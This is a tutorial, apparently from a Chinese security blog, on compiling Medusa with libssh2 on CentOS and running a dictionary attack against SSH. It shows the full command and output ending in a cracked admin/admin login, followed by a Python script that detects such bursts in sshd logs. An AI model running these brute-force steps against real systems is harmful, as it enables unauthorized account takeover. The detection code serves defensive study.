1. Software
OS: CentOS release 5.2 (Final) (check with cat /etc/issue)
Library: libssh2-1.2.7.tar.gz
medusa: medusa-2.0.tar.gz
2. Install libssh2-1.2.7
Copy libssh2-1.2.7.tar.gz to /tmp/, extract it to libssh2-1.2.7, and change into that directory:
2.1 ./configure
2.2 make
2.3 make install
3. Install medusa-2.0
Copy medusa-2.0.tar.gz to /tmp/, extract it to medusa-2.0, and change into that directory:
3.1 ./configure --build="i686-pc-linux" --enable-module-ssh=yes
3.2 make
3.3 make install
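4. Set the LD_LIBRARY_PATH environment variable so that medusa can find the required shared library when cracking SSH
export LD_LIBRARY_PATH=/usr/local/lib
NOTE: if an error like the following appears at run time, the step above generally resolves it
IMPORTANT: Couldn't load "ssh" [libssh2.so.1: cannot open shared object file: No such file or directory].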
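5. Start cracking SSH
Copy the dictionaries (e.g. brute.dic, p.dic) to /tmp/ and change into /tmp/. Typing medusa prints its help information, and based on that you can start cracking SSH. For example (assuming the target IP is 192.168.10.126):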
[root@CentOS2 tmp]# medusa -h 192.168.10.126 -U brute.dic -P p.dic -t 7 -f -r 10 -M ssh
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: adidas (123 of 4086 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: admin (124 of 4086 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.10.126 User: admin Password: admin [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 1 complete) Password: access (125 of 4086 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 1 complete) Password: accident (126 of 4086 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 1 complete) Password: across (127 of 4086 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 1 complete) Password: adam (128 of 4086 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 1 complete) Password: admin (129 of 4086 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.10.126 User: admin Password: admin [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 2 complete) Password: Admin (130 of 4086 complete)
When "ACCOUNT FOUND" appears, the crack has succeeded; in the example above, the cracked username is admin and the password is admin.
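On the target, a run like the one above shows up in the sshd log as a burst of failed password attempts from one address, here ending in an accepted login. The Python below is an added example, not part of the original article, that flags this pattern; the log lines, the host name, the source address 192.168.10.50 and the threshold and window values are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd auth-log sample (not from the original article).
# 192.168.10.50 is a made-up address for the host running the dictionary attack.
SAMPLE_LOG = """\
Mar  3 10:15:01 target sshd[4101]: Failed password for admin from 192.168.10.50 port 40110 ssh2
Mar  3 10:15:01 target sshd[4102]: Failed password for admin from 192.168.10.50 port 40112 ssh2
Mar  3 10:15:02 target sshd[4103]: Failed password for admin from 192.168.10.50 port 40114 ssh2
Mar  3 10:15:02 target sshd[4104]: Failed password for invalid user test from 192.168.10.50 port 40116 ssh2
Mar  3 10:15:03 target sshd[4105]: Failed password for admin from 192.168.10.50 port 40118 ssh2
Mar  3 10:15:03 target sshd[4106]: Failed password for admin from 192.168.10.50 port 40120 ssh2
Mar  3 10:15:04 target sshd[4107]: Accepted password for admin from 192.168.10.50 port 40122 ssh2
Mar  3 10:20:11 target sshd[4150]: Failed password for bob from 192.168.10.77 port 51000 ssh2
Mar  3 10:20:19 target sshd[4151]: Accepted password for bob from 192.168.10.77 port 51002 ssh2
"""

# OpenSSH password-authentication result lines in syslog format.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+")

def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {ip: {"failures": n, "compromised": [users]}} for sources with at
    least `threshold` failed logins inside `window` (both values are assumptions)."""
    failures = defaultdict(list)   # ip -> timestamps of recent failed logins
    alerts = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # Syslog timestamps carry no year; 2000 is assumed so parsing is stable.
        ts = datetime.strptime("2000 " + m["ts"], "%Y %b %d %H:%M:%S")
        ip = m["ip"]
        if m["result"] == "Failed":
            recent = [t for t in failures[ip] if ts - t <= window] + [ts]
            failures[ip] = recent
            if len(recent) >= threshold:
                entry = alerts.setdefault(ip, {"failures": 0, "compromised": []})
                entry["failures"] = max(entry["failures"], len(recent))
        elif ip in alerts:
            # Accepted login from an already-flagged source: a guessed password worked.
            alerts[ip]["compromised"].append(m["user"])
    return alerts
```

An address with a non-empty "compromised" list is the case that needs a credential reset, not just a block; the single mistyped password from 192.168.10.77 stays below the threshold and is not reported.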
This article is excerpted from the 独自等待 blog and was collected and compiled by the information security team of 网络安全攻防研究室 (www.91ri.org).